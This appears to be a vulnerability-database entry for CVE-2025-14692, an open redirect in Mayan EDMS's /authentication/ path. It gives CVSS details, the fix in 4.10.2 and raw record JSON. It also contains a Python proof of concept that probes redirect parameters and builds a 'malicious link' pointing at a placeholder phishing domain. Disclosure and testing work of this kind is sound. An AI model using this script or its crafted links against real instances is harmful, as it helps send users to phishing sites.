Security Vulnerability Report
CVE-2025-14692 CVSS 4.3 MEDIUM

CVE-2025-14692

Published: 2025-12-15 00:15:40
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in Mayan EDMS up to 4.10.1. The affected element is an unspecified function behind the /authentication/ path. Manipulating the request causes an open redirect. The attack can be initiated remotely. The exploit has been published and may be used. Upgrading the affected component to version 4.10.2 is sufficient to resolve this issue. The vendor confirms that this is "[f]ixed in version 4.10.2" and adds that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete."

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
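CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Note: the score shown here is the record's Secondary CVSS 3.1 assessment. The raw JSON below also carries a Primary CVSS 3.1 assessment of 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N), which rates scope as changed and adds a low confidentiality impact.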

Configurations (Affected Products)

cpe:2.3:a:mayan-edms:mayan_edms:*:*:*:*:*:*:*:* - VULNERABLE
Mayan EDMS <= 4.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
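# CVE-2025-14692 Mayan EDMS Open Redirect PoC
# Affected: Mayan EDMS <= 4.10.1
# Reference: https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC
import requests
import urllib.parse
from colorama import Fore, Style, init

init(autoreset=True)

# Query parameter names commonly used to carry a post-login destination.
REDIRECT_PARAMS = ('next', 'redirect', 'redirect_to', 'url', 'continue', 'return_url')


def _redirects_to_host(location, redirect_target):
    """Return True when the Location value itself points at redirect_target's host.

    Only the parsed host of the Location URL is compared. A Location that
    stays on the application and merely carries the probe value in its own
    query string (for example a login page that forwards the parameter it was
    given) is therefore not reported; a plain substring match would flag it.
    """
    wanted_host = urllib.parse.urlsplit(redirect_target).hostname
    actual_host = urllib.parse.urlsplit(location.strip()).hostname
    return wanted_host is not None and actual_host == wanted_host


def check_open_redirect(target_url, redirect_target, *, verify=True):
    """
    Check if Mayan EDMS is vulnerable to open redirect

    Sends one GET per candidate parameter to <target_url>/authentication/
    without following redirects and inspects the Location header.

    Args:
        target_url: Base URL of Mayan EDMS instance (e.g., https://target.com/)
        redirect_target: Absolute external URL used as the redirect probe value
        verify: Passed to requests as the TLS verification setting. Defaults
            to True so certificate errors surface instead of being ignored;
            pass a CA bundle path for instances with a private CA.

    Returns:
        bool: True if at least one parameter produced a redirect to the
        probe's host, False otherwise (including when no request completed).

    Raises:
        ValueError: redirect_target has no host, so the Location header
            cannot be compared against it.
    """
    if urllib.parse.urlsplit(redirect_target).hostname is None:
        raise ValueError("redirect_target must be an absolute URL with a host")

    auth_url = f"{target_url.rstrip('/')}/authentication/"
    vulnerable = False
    completed = 0

    for param in REDIRECT_PARAMS:
        try:
            response = requests.get(
                auth_url,
                params={param: redirect_target},
                allow_redirects=False,
                timeout=10,
                verify=verify,
            )
        except requests.RequestException as e:
            print(f"{Fore.RED}[!] Error testing parameter '{param}': {e}{Style.RESET_ALL}")
            continue

        completed += 1

        # is_redirect is only true for a 3xx status that carries a Location
        # header, so a Location on a non-redirect response is ignored.
        if not response.is_redirect:
            continue

        location = response.headers['location']
        if _redirects_to_host(location, redirect_target):
            print(f"{Fore.RED}[+] VULNERABLE: Parameter '{param}' allows open redirect{Style.RESET_ALL}")
            print(f"{Fore.YELLOW}[*] Redirects to: {location}{Style.RESET_ALL}")
            vulnerable = True

    if not completed:
        # Every request failed: a False return says nothing about the target.
        print(f"{Fore.YELLOW}[!] No probe completed; the result is inconclusive{Style.RESET_ALL}")

    return vulnerable


def generate_malicious_link(base_url, redirect_target):
    """Build the /authentication/?next=<redirect_target> URL for base_url.

    The redirect target is percent-encoded with urllib.parse.quote. The
    parameter name is always 'next', regardless of which parameter
    check_open_redirect reported.
    """
    auth_url = f"{base_url.rstrip('/')}/authentication/"
    malicious_url = f"{auth_url}?next={urllib.parse.quote(redirect_target)}"
    return malicious_url


if __name__ == "__main__":
    print(f"{Fore.CYAN}CVE-2025-14692 Mayan EDMS Open Redirect Checker{Style.RESET_ALL}")
    print("=" * 60)

    # Configuration (placeholder values from the published PoC)
    target = "https://vulnerable-mayan-edms.com"
    evil_domain = "https://malicious-phishing-site.com"

    # Check vulnerability
    print(f"{Fore.WHITE}[*] Target: {target}{Style.RESET_ALL}")
    print(f"{Fore.WHITE}[*] Malicious target: {evil_domain}{Style.RESET_ALL}\n")

    result = check_open_redirect(target, evil_domain)

    if result:
        print(f"{Fore.RED}[!] Target is VULNERABLE to CVE-2025-14692{Style.RESET_ALL}")
        malicious_link = generate_malicious_link(target, evil_domain)
        print(f"{Fore.YELLOW}[*] Malicious link: {malicious_link}{Style.RESET_ALL}")
    else:
        print(f"{Fore.GREEN}[+] Target appears to be NOT vulnerable{Style.RESET_ALL}")

    print("\n[*] Remediation: Upgrade to Mayan EDMS >= 4.10.2")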

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14692", "sourceIdentifier": "[email protected]", "published": "2025-12-15T00:15:39.563", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is \"[f]ixed in version 4.10.2\". Furthermore, that \"[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete.\""}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", 
"value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mayan-edms:mayan_edms:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "22B6971B-A1A5-4607-8F0E-61AB58D56521"}]}]}], "references": [{"url": "https://docs.mayan-edms.com/chapters/releases/4.10.2.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC/tree/main", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336410", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336410", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.711729", "source": "[email protected]", "tags": ["Third Party Advisory", " ... (truncated)